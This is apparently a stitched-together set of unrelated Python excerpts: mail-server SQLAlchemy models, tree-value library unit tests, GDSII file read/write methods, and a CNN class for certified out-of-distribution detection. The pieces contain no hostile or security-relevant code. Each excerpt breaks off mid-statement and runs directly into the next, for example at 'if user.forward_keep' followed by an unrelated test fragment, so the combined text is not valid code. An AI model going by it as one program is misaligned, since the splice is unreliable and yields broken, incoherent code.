The name "domain alias" was avoided to prevent some confusion.
"""
__tablename__ = 'alternative'
name = db.Column(IdnaDomain, primary_key=True, nullable=False)
domain_name = db.Column(IdnaDomain, db.ForeignKey(Domain.name))
domain = db.relationship(Domain,
backref=db.backref('alternatives', cascade='all, delete-orphan'))
class Relay(Base):
""" Relayed mail domain.
The domain is either relayed publicly or through a specified SMTP host.
"""
__tablename__ = 'relay'
name = db.Column(IdnaDomain, primary_key=True, nullable=False)
smtp = db.Column(db.String(80), nullable=True)
class Email(object):
""" Abstraction for an email address (localpart and domain).
"""
localpart = db.Column(db.String(80), nullable=False)
@declarative.declared_attr
def domain_name(cls):
""" the domain part of the email address """
return db.Column(IdnaDomain, db.ForeignKey(Domain.name),
nullable=False, default=IdnaDomain)
# This field is redundant with both localpart and domain name.
# It is however very useful for quick lookups without joining tables,
# especially when the mail server is reading the database.
@declarative.declared_attr
def _email(cls):
""" the complete email address (localpart@domain) """
def updater(ctx):
key = f'{cls.__tablename__}_email'
if key in ctx.current_parameters:
return ctx.current_parameters[key]
return '{localpart}@{domain_name}'.format_map(ctx.current_parameters)
return db.Column('email', IdnaEmail, primary_key=True, nullable=False, onupdate=updater)
# We need to keep email, localpart and domain_name in sync.
# But IMHO using email as primary key was not a good idea in the first place.
@hybrid_property
def email(self):
""" getter for email - gets _email """
return self._email
@email.setter
def email(self, value):
""" setter for email - sets _email, localpart and domain_name at once """
self.localpart, self.domain_name = value.rsplit('@', 1)
self._email = value
@staticmethod
def _update_localpart(target, value, *_):
if target.domain_name:
target._email = f'{value}@{target.domain_name}'
@staticmethod
def _update_domain_name(target, value, *_):
if target.localpart:
target._email = f'{target.localpart}@{value}'
@classmethod
def __declare_last__(cls):
# gets called after mappings are completed
sqlalchemy.event.listen(cls.localpart, 'set', cls._update_localpart, propagate=True)
sqlalchemy.event.listen(cls.domain_name, 'set', cls._update_domain_name, propagate=True)
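# Sketch of the synchronisation behaviour above (informal, hypothetical values):
# assigning user.email = 'joe@example.com' sets localpart='joe',
# domain_name='example.com' and _email='joe@example.com'; a later
# user.localpart = 'jane' fires _update_localpart and _email becomes 'jane@example.com'.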
def sendmail(self, subject, body):
""" send an email to the address """
f_addr = f'{app.config["POSTMASTER"]}@{idna.encode(app.config["DOMAIN"]).decode("ascii")}'
with smtplib.SMTP(app.config['HOST_AUTHSMTP'], port=10025) as smtp:
to_address = f'{self.localpart}@{idna.encode(self.domain_name).decode("ascii")}'
msg = text.MIMEText(body)
msg['Subject'] = subject
msg['From'] = f_addr
msg['To'] = to_address
smtp.sendmail(f_addr, [to_address], msg.as_string())
@classmethod
def resolve_domain(cls, email):
""" resolves domain alternative to real domain """
localpart, domain_name = email.rsplit('@', 1) if '@' in email else (None, email)
alternative = Alternative.query.get(domain_name)
if alternative:
domain_name = alternative.domain_name
return (localpart, domain_name)
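# Illustrative (hypothetical data): with an Alternative 'example.org' mapped to the real
# Domain 'example.com', resolve_domain('user@example.org') returns ('user', 'example.com');
# a bare domain string such as 'example.org' yields (None, 'example.com').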
@classmethod
def resolve_destination(cls, localpart, domain_name, ignore_forward_keep=False):
""" return destination for email address localpart@domain_name """
localpart_stripped = None
stripped_alias = None
delimiter = os.environ.get('RECIPIENT_DELIMITER')
if delimiter and delimiter in localpart:
localpart_stripped = localpart.rsplit(delimiter, 1)[0]
user = User.query.get(f'{localpart}@{domain_name}')
if not user and localpart_stripped:
user = User.query.get(f'{localpart_stripped}@{domain_name}')
if user:
email = f'{localpart}@{domain_name}'
if user.forward_enabled:
destination = user.forward_destination
if user.forward_keep | |
1, 'b': 2, 'x': {'c': 3, 'd': 4}})
t2 = tree_value_clazz({'a': 11, 'b': 22, 'x': {'c': 33, 'd': 5}})
assert (t2 >> t1) == tree_value_clazz({'a': 5, 'b': 5, 'x': {'c': 4, 'd': 0}})
assert (32 >> t1) == tree_value_clazz({'a': 16, 'b': 8, 'x': {'c': 4, 'd': 2}})
original_id = id(t2._detach())
original_id_x = id(t2.x._detach())
t4 = t2 >> t1
t2 >>= t1
assert t2 == t4
assert id(t2._detach()) == original_id
assert id(t2.x._detach()) == original_id_x
def test_numeric_pos(self):
t1 = tree_value_clazz({'a': 1, 'b': 2, 'x': {'c': 3, 'd': 4}})
assert +t1 == tree_value_clazz({'a': 1, 'b': 2, 'x': {'c': 3, 'd': 4}})
def test_numeric_neg(self):
t1 = tree_value_clazz({'a': 1, 'b': 2, 'x': {'c': 3, 'd': 4}})
assert -t1 == tree_value_clazz({'a': -1, 'b': -2, 'x': {'c': -3, 'd': -4}})
def test_numeric_invert(self):
t1 = tree_value_clazz({'a': 1, 'b': 2, 'x': {'c': 3, 'd': 4}})
assert ~t1 == tree_value_clazz({'a': -2, 'b': -3, 'x': {'c': -4, 'd': -5}})
def test_getitem(self):
t1 = tree_value_clazz({'a': 1, 'b': 2, 'x': {'c': 3, 'd': 4}})
t2 = tree_value_clazz({'a': [2, 3, 5, 7], 'b': [11, 13, 17, 19],
'x': {'c': [23, 29, 31, 37], 'd': [41, 43, 47, 53]}})
assert t2[t1 - 1] == tree_value_clazz({'a': 2, 'b': 13, 'x': {'c': 31, 'd': 53}})
def test_setitem(self):
t1 = tree_value_clazz({'a': 1, 'b': 2, 'x': {'c': 3, 'd': 4}})
t2 = tree_value_clazz({'a': [2, 3, 5, 7], 'b': [11, 13, 17, 19],
'x': {'c': [23, 29, 31, 37], 'd': [41, 43, 47, 53]}})
t2[t1 - 1] = t1
assert t2 == tree_value_clazz({'a': [1, 3, 5, 7], 'b': [11, 2, 17, 19],
'x': {'c': [23, 29, 3, 37], 'd': [41, 43, 47, 4]}})
def test_delitem(self):
t1 = tree_value_clazz({'a': 1, 'b': 2, 'x': {'c': 3, 'd': 4}})
t2 = tree_value_clazz({'a': [2, 3, 5, 7], 'b': [11, 13, 17, 19],
'x': {'c': [23, 29, 31, 37], 'd': [41, 43, 47, 53]}})
del t2[t1 - 1]
assert t2 == tree_value_clazz({'a': [3, 5, 7], 'b': [11, 17, 19],
'x': {'c': [23, 29, 37], 'd': [41, 43, 47]}})
def test_attr(self):
t1 = tree_value_clazz({'a': 1, 'b': 2, 'x': {'c': 3, 'd': 4}})
t2 = func_treelize(return_type=tree_value_clazz)(Container)(t1)
assert t2 == tree_value_clazz(
{'a': Container(1), 'b': Container(2), 'x': {'c': Container(3), 'd': Container(4)}})
assert t2.value == t1
def test_call(self):
t1 = tree_value_clazz({'a': 1, 'b': 2, 'x': {'c': 3, 'd': 4}})
t2 = func_treelize(return_type=tree_value_clazz)(Container)(t1)
assert t2.add(10) == tree_value_clazz({'a': 11, 'b': 12, 'x': {'c': 13, 'd': 14}})
assert t2.add(x=10) == tree_value_clazz({'a': 11, 'b': 12, 'x': {'c': 13, 'd': 14}})
assert t2.add(t1) == tree_value_clazz({'a': 2, 'b': 4, 'x': {'c': 6, 'd': 8}})
def test_map(self):
cnt = 0
def f(x):
nonlocal cnt
cnt += 1
return x + 2
t1 = tree_value_clazz({'a': 1, 'b': 2, 'x': {'c': 3, 'd': 4}})
assert cnt == 0
t2 = t1.map(f)
assert cnt == 4
assert t2 == tree_value_clazz({'a': 3, 'b': 4, 'x': {'c': 5, 'd': 6}})
cnt = 0
t3 = tree_value_clazz({
'a': delayed(lambda: t1.a),
'b': delayed(lambda: t1.b),
'x': delayed(lambda: t1.x),
})
assert cnt == 0
t4 = t3.map(f, delayed=True)
assert cnt == 0
assert t4.a == 3
assert cnt == 1
assert t4 == tree_value_clazz({'a': 3, 'b': 4, 'x': {'c': 5, 'd': 6}})
assert cnt == 4
assert t4.a == 3
assert cnt == 4
def test_type(self):
t1 = tree_value_clazz({'a': 1, 'b': 2, 'x': {'c': 3, 'd': 4}})
assert t1.type(TreeValue) == TreeValue({'a': 1, 'b': 2, 'x': {'c': 3, 'd': 4}})
assert t1.type(TreeValue) != tree_value_clazz({'a': 1, 'b': 2, 'x': {'c': 3, 'd': 4}})
def test_filter(self):
t1 = tree_value_clazz({'a': 1, 'b': 2, 'x': {'c': 3, 'd': 4}})
assert t1.filter(lambda x: x % 2 == 1) == tree_value_clazz({'a': 1, 'x': {'c': 3}})
assert t1.filter(lambda x: x < 3) == tree_value_clazz({'a': 1, 'b': 2, })
assert t1.filter(lambda x: x < 3, False) == tree_value_clazz({'a': 1, 'b': 2, 'x': {}})
def test_mask(self):
t1 = tree_value_clazz({'a': 13, 'b': 27, 'x': {'c': 39, 'd': 45}})
t2 = tree_value_clazz({'a': 1, 'b': 2, 'x': {'c': 3, 'd': 4}})
t3 = tree_value_clazz({'a': 1, 'b': 2, 'x': {'c': 7, 'd': 4}})
mask1 = t2.map(lambda x: (lambda v: v % x == 0))(t1)
assert t1.mask(mask1) == tree_value_clazz({'a': 13, 'x': {'c': 39}})
mask2 = t3.map(lambda x: (lambda v: v % x == 0))(t1)
assert t1.mask(mask2) == tree_value_clazz({'a': 13})
assert t1.mask(mask2, False) == tree_value_clazz({'a': 13, 'x': {}})
def test_reduce(self):
t1 = tree_value_clazz({'a': 13, 'b': 27, 'x': {'c': 39, 'd': 45}})
t2 = tree_value_clazz({'a': 1, 'b': 2, 'x': {'c': 3, 'd': 4}})
assert t1.reduce(lambda **kwargs: sum(kwargs.values())) == 124
assert t2.reduce(lambda **kwargs: reduce(__mul__, kwargs.values())) == 24
def test_union(self):
t1 = tree_value_clazz({'a': 13, 'b': 27, 'x': {'c': 39, 'd': 45}})
t2 = tree_value_clazz({'a': 1, 'b': 2, 'x': {'c': 3, 'd': 4}})
t3 = tree_value_clazz({'a': 1, 'b': 2, 'x': {'c': 7, 'd': 4}})
assert tree_value_clazz.union(t1, t2, t3) == tree_value_clazz({
'a': (13, 1, 1),
'b': (27, 2, 2),
'x': {
'c': (39, 3, 7),
'd': (45, 4, 4),
}
})
assert tree_value_clazz.union(t1, t2, t3, return_type=TreeValue) == TreeValue({
'a': (13, 1, 1),
'b': (27, 2, 2),
'x': {
'c': (39, 3, 7),
'd': (45, 4, 4),
}
})
def test_subside(self):
data = {
'a': TreeValue({'a': 1, 'b': 2}),
'x': {
'c': TreeValue({'a': 3, 'b': 4}),
'd': [
TreeValue({'a': 5, 'b': 6}),
TreeValue({'a': 7, 'b': 8}),
]
},
'k': '233'
}
assert tree_value_clazz.subside(data) == tree_value_clazz({
'a': raw({'a': 1, 'k': '233', 'x': {'c': 3, 'd': [5, 7]}}),
'b': raw({'a': 2, 'k': '233', 'x': {'c': 4, 'd': [6, 8]}}),
})
assert tree_value_clazz.subside(data, return_type=TreeValue) == TreeValue({
'a': raw({'a': 1, 'k': '233', 'x': {'c': 3, 'd': [5, 7]}}),
'b': raw({'a': 2, 'k': '233', 'x': {'c': 4, 'd': [6, 8]}}),
})
def test_rise(self):
data = {
'a': TreeValue({'a': 1, 'b': 2}),
'x': {
'c': TreeValue({'a': 3, 'b': 4}),
'd': [
TreeValue({'a': 5, 'b': 6}),
TreeValue({'a': 7, 'b': 8}),
]
},
'k': '233'
}
t1 = tree_value_clazz.subside(data)
assert t1.rise() == {
'a': tree_value_clazz({'a': 1, 'b': 2}),
'x': {
'c': tree_value_clazz({'a': 3, 'b': 4}),
'd': [
tree_value_clazz({'a': 5, 'b': 6}),
tree_value_clazz({'a': 7, 'b': 8}),
]
},
'k': tree_value_clazz({'a': '233', 'b': '233'}),
}
def test_deep_clone(self):
t = tree_value_clazz({
'a': raw({'a': 1, 'b': 2}),
'b': raw({'a': 3, 'b': 4}),
'x': {
'c': raw({'a': 5, 'b': 6}),
'd': raw({'a': 7, 'b': 8}),
}
})
t1 = t.clone()
assert t1 == t
assert t1.a is t.a
assert t1.b is t.b
assert t1.x.c is t.x.c
assert t1.x.d is t.x.d
t2 = t.clone(copy_value=True)
assert t2 == t
assert t2.a is not t.a
assert t2.b is not t.b
assert t2.x.c is not t.x.c
assert t2.x.d is not t.x.d
def test_graph(self):
t = tree_value_clazz({
'a': [4, 3, 2, 1],
'b': np.array([[5, 6], [7, 8]]),
'x': {
'c': np.array([[5, 7], [8, 6]]),
'd': {'a', 'b', 'c'},
'e': np.array([[1, 2], [3, 4]])
},
})
graph = t.graph('t')
assert 2210 <= len(graph.source) <= 2290
def test_graphics(self):
t = tree_value_clazz({
'a': [4, 3, 2, 1],
'b': np.array([[5, 6], [7, 8]]),
'x': {
'c': np.array([[5, 7], [8, 6]]),
'd': {'a', 'b', 'c'},
'e': np.array([[1, 2], [3, 4]])
},
})
t1 = tree_value_clazz({
'aa': t.a,
'bb': np.array([[5, 6], [7, 8]]),
'xx': {
'cc': t.x.c,
'dd': t.x.d,
'ee': np.array([[1, 2], [3, 4]])
},
})
graph_1 = tree_value_clazz.graphics(
(t, 't'), (t1, 't1'),
(tree_value_clazz({'a': t, 'b': t1, 'c': [1, 2], 'd': t1.xx}), 't2'),
dup_value=(np.ndarray, list),
title="This is a demo of 2 trees with dup value.",
cfg={'bgcolor': '#ffffffff'},
)
assert 4910 <= len(graph_1.source) <= 4960
graph_2 = tree_value_clazz.graphics(
(t, 't'), (t1, 't1'),
(tree_value_clazz({'a': t, 'b': t1, 'c': [1, 2], 'd': t1.xx}), 't2'),
dup_value=False,
title="This is a demo of 2 trees with dup value.",
cfg={'bgcolor': '#ffffffff'},
)
assert 5420 <= len(graph_2.source) <= 5480
graph_3 = tree_value_clazz.graphics(
(t, 't'), (t1, 't1'),
(tree_value_clazz({'a': t, 'b': t1, 'c': [1, 2], 'd': t1.xx}), 't2'),
dup_value=lambda x: id(x),
title="This is a demo of 2 trees with dup value.",
cfg={'bgcolor': '#ffffffff'},
)
assert 4700 <= len(graph_3.source) <= 4760
graph_4 = tree_value_clazz.graphics(
(t, 't'), (t1, 't1'),
(tree_value_clazz({'a': t, 'b': t1, 'c': [1, 2], 'd': t1.xx}), 't2'),
dup_value=lambda x: type(x).__name__,
title="This is | |
GDSII file will be the
dimensions of the objects created times the ratio
unit/precision. For example, if a circle with radius 1.5 is
created and we set `GdsLibrary.unit` to 1.0e-6 (1 um) and
`GdsLibrary.precision` to 1.0e-9 (1 nm), the radius of the
circle will be 1.5 um and the GDSII file will contain the
dimension 1500 nm.
Parameters
----------
outfile : file, string or Path
The file (or path) where the GDSII stream will be written.
It must be opened for writing operations in binary format.
cells : iterable
The cells or cell names to be included in the library. If
None, all cells are used.
timestamp : datetime object
Sets the GDSII timestamp. If None, the current time is
used.
binary_cells : iterable of bytes
Iterable with binary data for GDSII cells (from
`get_binary_cells`, for example).
Notes
-----
Only the specified cells are written. The user is responsible
for ensuring all cell dependencies are satisfied.
"""
close = True
if hasattr(outfile, "__fspath__"):
outfile = open(outfile.__fspath__(), "wb")
elif isinstance(outfile, (basestring, Path)):
outfile = open(outfile, "wb")
else:
close = False
now = datetime.datetime.today() if timestamp is None else timestamp
name = self.name if len(self.name) % 2 == 0 else (self.name + "\0")
outfile.write(
struct.pack(
">5H12h2H",
6,
0x0002,
0x0258,
28,
0x0102,
now.year,
now.month,
now.day,
now.hour,
now.minute,
now.second,
now.year,
now.month,
now.day,
now.hour,
now.minute,
now.second,
4 + len(name),
0x0206,
)
+ name.encode("ascii")
+ struct.pack(">2H", 20, 0x0305)
+ _eight_byte_real(self.precision / self.unit)
+ _eight_byte_real(self.precision)
)
if cells is None:
cells = self.cells.values()
else:
cells = [self.cells.get(c, c) for c in cells]
if len(cells) == 0:
warnings.warn("[GDSPY] Creating a GDSII file without any cells.")
for cell in cells:
cell.to_gds(outfile, self.unit / self.precision)
if binary_cells is not None:
for bc in binary_cells:
outfile.write(bc)
outfile.write(struct.pack(">2H", 4, 0x0400))
if close:
outfile.close()
def read_gds(
self,
infile,
units="skip",
rename={},
rename_template="{name}",
layers={},
datatypes={},
texttypes={},
):
"""
Read a GDSII file into this library.
Parameters
----------
infile : file, string or Path
GDSII stream file (or path) to be imported. It must be
opened for reading in binary format.
units : {'convert', 'import', 'skip'}
Controls how to scale and use the units in the imported
file. 'convert': the imported geometry is scaled to
this library units. 'import': the unit and precision in
this library are replaced by those from the imported file.
'skip': the imported geometry is not scaled and units
are not replaced; the geometry is imported in the *user
units* of the file.
rename : dictionary
Dictionary used to rename the imported cells. Keys and
values must be strings.
rename_template : string
Template string used to rename the imported cells. Applied
only if the cell name is not in the `rename` dictionary.
Examples: 'prefix-{name}', '{name}-suffix'
layers : dictionary
Dictionary used to convert the layers in the imported cells.
Keys and values must be integers.
datatypes : dictionary
Dictionary used to convert the datatypes in the imported
cells. Keys and values must be integers.
texttypes : dictionary
Dictionary used to convert the text types in the imported
cells. Keys and values must be integers.
Returns
-------
out : `GdsLibrary`
This object.
Notes
-----
Not all features from the GDSII specification are currently
supported. A warning will be produced if any unsupported
features are found in the imported file.
"""
self._references = []
close = True
if hasattr(infile, "__fspath__"):
infile = open(infile.__fspath__(), "rb")
elif isinstance(infile, (basestring, Path)):
infile = open(infile, "rb")
else:
close = False
emitted_warnings = []
kwargs = {}
create_element = None
factor = 1
cell = None
properties = {}
attr = -1
for record in _record_reader(infile):
# LAYER
if record[0] == 0x0D:
kwargs["layer"] = layers.get(record[1][0], record[1][0])
# DATATYPE or BOXTYPE
elif record[0] == 0x0E or record[0] == 0x2E:
kwargs["datatype"] = datatypes.get(record[1][0], record[1][0])
# TEXTTYPE
elif record[0] == 0x16:
kwargs["texttype"] = texttypes.get(record[1][0], record[1][0])
# XY
elif record[0] == 0x10:
if "xy" in kwargs:
kwargs["xy"] = numpy.concatenate((kwargs["xy"], factor * record[1]))
else:
kwargs["xy"] = factor * record[1]
# WIDTH
elif record[0] == 0x0F:
kwargs["width"] = factor * abs(record[1][0])
if record[1][0] < 0:
kwargs["width_transform"] = False
# ENDEL
elif record[0] == 0x11:
if create_element is not None:
el = create_element(**kwargs)
if len(properties) > 0:
el.properties = properties
properties = {}
cell.add(el)
create_element = None
kwargs = {}
# BOUNDARY
elif record[0] == 0x08:
create_element = self._create_polygon
# PATH
elif record[0] == 0x09:
create_element = self._create_path
# BOX
elif record[0] == 0x2D:
create_element = self._create_polygon
if record[0] not in emitted_warnings:
warnings.warn(
"[GDSPY] GDSII elements of type BOX are imported as polygons.",
stacklevel=2,
)
emitted_warnings.append(record[0])
# TEXT
elif record[0] == 0x0C:
create_element = self._create_label
# SNAME
elif record[0] == 0x12:
if record[1] in rename:
name = rename[record[1]]
else:
name = rename_template.format(name=record[1])
kwargs["ref_cell"] = name
# COLROW
elif record[0] == 0x13:
kwargs["columns"] = record[1][0]
kwargs["rows"] = record[1][1]
# STRANS
elif record[0] == 0x1A:
kwargs["x_reflection"] = (int(record[1][0]) & 0x8000) > 0
if (int(record[1][0]) & 0x0006) and record[0] not in emitted_warnings:
warnings.warn(
"[GDSPY] Absolute magnification or rotation of "
"references is not supported. Transformations "
"will be interpreted as relative.",
stacklevel=2,
)
emitted_warnings.append(record[0])
# MAG
elif record[0] == 0x1B:
kwargs["magnification"] = record[1][0]
# ANGLE
elif record[0] == 0x1C:
kwargs["rotation"] = record[1][0]
# SREF
elif record[0] == 0x0A:
create_element = self._create_reference
# AREF
elif record[0] == 0x0B:
create_element = self._create_array
# STRNAME
elif record[0] == 0x06:
if record[1] in rename:
name = rename[record[1]]
else:
name = rename_template.format(name=record[1])
cell = Cell(name, exclude_from_current=True)
self.cells[name] = cell
# STRING
elif record[0] == 0x19:
kwargs["text"] = record[1]
# ENDSTR
elif record[0] == 0x07:
cell = None
# UNITS
elif record[0] == 0x03:
if units == "skip":
factor = record[1][0]
elif units == "import":
self.unit = record[1][1] / record[1][0]
self.precision = record[1][1]
factor = record[1][0]
elif units == "convert":
factor = record[1][1] / self.unit
else:
raise ValueError(
"[GDSPY] units must be one of 'convert', 'import' or 'skip'."
)
# LIBNAME
elif record[0] == 0x02:
self.name = record[1]
# PRESENTATION
elif record[0] == 0x17:
kwargs["anchor"] = GdsLibrary._import_anchors[
int(record[1][0]) & 0x000F
]
# PATHTYPE
elif record[0] == 0x21:
kwargs["ends"] = GdsLibrary._pathtype_dict.get(record[1][0], "extended")
# BGNEXTN
elif record[0] == 0x30:
kwargs["bgnextn"] = factor * record[1][0]
# ENDEXTN
elif record[0] == 0x31:
kwargs["endextn"] = factor * record[1][0]
# ENDLIB
elif record[0] == 0x04:
for ref in self._references:
if ref.ref_cell in self.cells:
ref.ref_cell = self.cells[ref.ref_cell]
# PROPATTR
elif record[0] == 0x2B:
attr = record[1][0]
# PROPVALUE
elif record[0] == 0x2C:
properties[attr] = record[1]
# Not supported
elif (
record[0] not in emitted_warnings
and record[0] not in GdsLibrary._unused_records
):
warnings.warn(
"[GDSPY] Record type {0} ({1:02X}) is not supported.".format(
GdsLibrary._record_name[record[0]], record[0]
),
stacklevel=2,
)
emitted_warnings.append(record[0])
if close:
infile.close()
return self
def _create_polygon(self, layer, datatype, xy):
return Polygon(xy[:-2].reshape((xy.size // 2 - 1, 2)), layer, datatype)
def _create_path(self, **kwargs):
xy = kwargs.pop("xy")
if "bgnextn" in kwargs or "endextn" in kwargs:
kwargs["ends"] = (kwargs.pop("bgnextn", 0), kwargs.pop("endextn", 0))
kwargs["points"] = xy.reshape((xy.size // 2, 2))
kwargs["gdsii_path"] = True
return FlexPath(**kwargs)
def _create_label(self, xy, width=None, ends=None, **kwargs):
kwargs["position"] = xy
return Label(**kwargs)
def _create_reference(self, **kwargs):
kwargs["origin"] = kwargs.pop("xy")
kwargs["ignore_missing"] = True
ref = CellReference(**kwargs)
ref.ref_cell = kwargs["ref_cell"]
self._references.append(ref)
return ref
def _create_array(self, **kwargs):
xy = kwargs.pop("xy")
kwargs["origin"] = xy[0:2]
if "x_reflection" in kwargs:
if "rotation" in kwargs:
sa = -numpy.sin(kwargs["rotation"] * numpy.pi / 180.0)
ca = numpy.cos(kwargs["rotation"] * numpy.pi / 180.0)
x2 = (xy[2] - xy[0]) * ca - (xy[3] - xy[1]) * sa + xy[0]
y3 = (xy[4] - xy[0]) * sa + (xy[5] - xy[1]) * ca + xy[1]
else:
x2 = xy[2]
y3 = xy[5]
if kwargs["x_reflection"]:
y3 = 2 * xy[1] - y3
kwargs["spacing"] = (
(x2 - xy[0]) / kwargs["columns"],
(y3 - xy[1]) / kwargs["rows"],
)
else:
kwargs["spacing"] = (
(xy[2] - xy[0]) / kwargs["columns"],
(xy[5] - xy[1]) / kwargs["rows"],
)
kwargs["ignore_missing"] = True
ref = CellArray(**kwargs)
ref.ref_cell = kwargs["ref_cell"]
self._references.append(ref)
return ref
def top_level(self):
"""
Output the top level cells from the GDSII | |
<reponame>AlexMeinke/Provable-OOD-Detection
import torch
import torch.nn as nn
import copy
from torch.nn import functional as F
import utils.models.modules_ibp as modules_ibp
class CNN_IBP(nn.Module):
def __init__(self, dset_in_name='MNIST', size='L', width=None, last_bias=True, num_classes=None, last_layer_neg=False):
super().__init__()
if dset_in_name == 'MNIST':
self.color_channels = 1
self.hw = 28
num_classes = 10 if num_classes is None else num_classes
elif dset_in_name == 'CIFAR10' or dset_in_name == 'SVHN':
self.color_channels = 3
self.hw = 32
num_classes = 10 if num_classes is None else num_classes
elif dset_in_name == 'CIFAR100':
self.color_channels = 3
self.hw = 32
num_classes = 100 if num_classes is None else num_classes
elif dset_in_name == 'RImgNet':
self.color_channels = 3
self.hw = 224
num_classes = 9 if num_classes is None else num_classes
else:
raise ValueError(f'{dset_in_name} dataset not supported.')
self.num_classes = num_classes
self.size = size
self.width = width
if last_layer_neg:
last_layer_type = modules_ibp.LinearI_Neg
else:
last_layer_type = modules_ibp.LinearI
self.last_layer_type = last_layer_type
if size == 'L':
self.C1 = modules_ibp.Conv2dI(self.color_channels, 64, 3, padding=1, stride=1)
self.A1 = modules_ibp.ReLUI()
self.C2 = modules_ibp.Conv2dI(64, 64, 3, padding=1, stride=1)
self.A2 = modules_ibp.ReLUI()
self.C3 = modules_ibp.Conv2dI(64, 128, 3, padding=1, stride=2)
self.A3 = modules_ibp.ReLUI()
self.C4 = modules_ibp.Conv2dI(128, 128, 3, padding=1, stride=1)
self.A4 = modules_ibp.ReLUI()
self.C5 = modules_ibp.Conv2dI(128, 128, 3, padding=1, stride=1)
self.A5 = modules_ibp.ReLUI()
self.F = modules_ibp.FlattenI()
self.L6 = modules_ibp.LinearI(128*(self.hw//2)**2, 512)
self.A6 = modules_ibp.ReLUI()
self.L7 = last_layer_type(512, self.num_classes, bias=last_bias)
self.layers = (self.C1,
self.A1,
self.C2,
self.A2,
self.C3,
self.A3,
self.C4,
self.A4,
self.C5,
self.A5,
self.F,
self.L6,
self.A6,
self.L7,
)
self.__name__ = 'CNN_L_' + dset_in_name
elif size == 'XL':
self.C1 = modules_ibp.Conv2dI(self.color_channels, 128, 3, padding=1, stride=1)
self.A1 = modules_ibp.ReLUI()
self.C2 = modules_ibp.Conv2dI(128, 128, 3, padding=1, stride=1)
self.A2 = modules_ibp.ReLUI()
self.C3 = modules_ibp.Conv2dI(128, 256, 3, padding=1, stride=2)
self.A3 = modules_ibp.ReLUI()
self.C4 = modules_ibp.Conv2dI(256, 256, 3, padding=1, stride=1)
self.A4 = modules_ibp.ReLUI()
self.C5 = modules_ibp.Conv2dI(256, 256, 3, padding=1, stride=1)
self.A5 = modules_ibp.ReLUI()
self.F = modules_ibp.FlattenI()
self.L6 = modules_ibp.LinearI(256*(self.hw//2)**2, 512)
self.A6 = modules_ibp.ReLUI()
self.L7 = modules_ibp.LinearI(512, 512)
self.A7 = modules_ibp.ReLUI()
self.L8 = last_layer_type(512, self.num_classes, bias=last_bias)
self.layers = (self.C1,
self.A1,
self.C2,
self.A2,
self.C3,
self.A3,
self.C4,
self.A4,
self.C5,
self.A5,
self.F,
self.L6,
self.A6,
self.L7,
self.A7,
self.L8,
)
self.__name__ = 'CNN_XL_' + dset_in_name
elif size == 'XL_b':
self.C1 = modules_ibp.Conv2dI(self.color_channels, 128, 3, padding=1, stride=1)
self.A1 = modules_ibp.ReLUI()
self.C2 = modules_ibp.Conv2dI(128, 128, 3, padding=1, stride=1)
self.A2 = modules_ibp.ReLUI()
self.C3 = modules_ibp.Conv2dI(128, 256, 3, padding=1, stride=2)
self.A3 = modules_ibp.ReLUI()
self.C4 = modules_ibp.Conv2dI(256, 256, 3, padding=1, stride=1)
self.A4 = modules_ibp.ReLUI()
self.C5 = modules_ibp.Conv2dI(256, 256, 3, padding=1, stride=1)
self.A5 = modules_ibp.ReLUI()
self.F = modules_ibp.FlattenI()
self.L6 = modules_ibp.LinearI(256*(self.hw//2)**2, 512)
self.A6 = modules_ibp.ReLUI()
self.L7 = last_layer_type(512, self.num_classes, bias=last_bias)
self.layers = (self.C1,
self.A1,
self.C2,
self.A2,
self.C3,
self.A3,
self.C4,
self.A4,
self.C5,
self.A5,
self.F,
self.L6,
self.A6,
self.L7,
)
self.__name__ = 'CNN_XL_b_' + dset_in_name
elif size == 'C1':
self.C1 = modules_ibp.Conv2dI(self.color_channels, 128, 3, padding=1, stride=1)
self.A1 = modules_ibp.ReLUI()
self.C2 = modules_ibp.Conv2dI(128, 128, 3, padding=1, stride=1)
self.A2 = modules_ibp.ReLUI()
self.C3 = modules_ibp.Conv2dI(128, 256, 3, padding=1, stride=2)
self.A3 = modules_ibp.ReLUI()
self.C4 = modules_ibp.Conv2dI(256, 256, 3, padding=1, stride=1)
self.A4 = modules_ibp.ReLUI()
self.C5 = modules_ibp.Conv2dI(256, 256, 3, padding=1, stride=1)
self.A5 = modules_ibp.ReLUI()
self.F = modules_ibp.FlattenI()
self.L6 = modules_ibp.LinearI(256*(self.hw//2)**2, 512)
self.A6 = modules_ibp.ReLUI()
self.L7 = last_layer_type(512, self.num_classes)
self.layers = (self.C1,
self.A1,
self.C2,
self.A2,
self.C3,
self.A3,
self.C4,
self.A4,
self.C5,
self.A5,
self.F,
self.L6,
self.A6,
self.L7,
)
self.__name__ = 'CNN_C1_' + dset_in_name
elif size == 'C2':
self.width = 2
self.C1 = modules_ibp.Conv2dI(self.color_channels, 128*self.width, 3, padding=1, stride=1)
self.A1 = modules_ibp.ReLUI()
self.C2 = modules_ibp.Conv2dI(128*self.width, 128*self.width, 3, padding=1, stride=1)
self.A2 = modules_ibp.ReLUI()
self.C3 = modules_ibp.Conv2dI(128*self.width, 256*self.width, 3, padding=1, stride=2)
self.A3 = modules_ibp.ReLUI()
self.C4 = modules_ibp.Conv2dI(256*self.width, 256*self.width, 3, padding=1, stride=1)
self.A4 = modules_ibp.ReLUI()
self.C5 = modules_ibp.Conv2dI(256*self.width, 256*self.width, 3, padding=1, stride=1)
self.A5 = modules_ibp.ReLUI()
self.F = modules_ibp.FlattenI()
self.L6 = modules_ibp.LinearI(256*self.width*(self.hw//2)**2, 512*self.width)
self.A6 = modules_ibp.ReLUI()
self.L7 = last_layer_type(512*self.width, self.num_classes)
self.layers = (self.C1,
self.A1,
self.C2,
self.A2,
self.C3,
self.A3,
self.C4,
self.A4,
self.C5,
self.A5,
self.F,
self.L6,
self.A6,
self.L7,
)
self.__name__ = f'CNN_C2-{self.width}_' + dset_in_name
elif size == 'C3':
self.width = 2
self.C1 = modules_ibp.Conv2dI(self.color_channels, 128*self.width, 3, padding=1, stride=1)
self.A1 = modules_ibp.ReLUI()
self.C2 = modules_ibp.Conv2dI(128*self.width, 256*self.width, 3, padding=1, stride=2)
self.A2 = modules_ibp.ReLUI()
self.C3 = modules_ibp.Conv2dI(256*self.width, 256*self.width, 3, padding=1, stride=1)
self.A3 = modules_ibp.ReLUI()
self.F = modules_ibp.FlattenI()
self.L4 = modules_ibp.LinearI(256*self.width*(self.hw//2)**2, 512)
self.A4 = modules_ibp.ReLUI()
self.L5 = last_layer_type(512, self.num_classes)
self.layers = (self.C1,
self.A1,
self.C2,
self.A2,
self.C3,
self.A3,
self.F,
self.L4,
self.A4,
self.L5,
)
self.__name__ = f'CNN_C3-{self.width}_' + dset_in_name
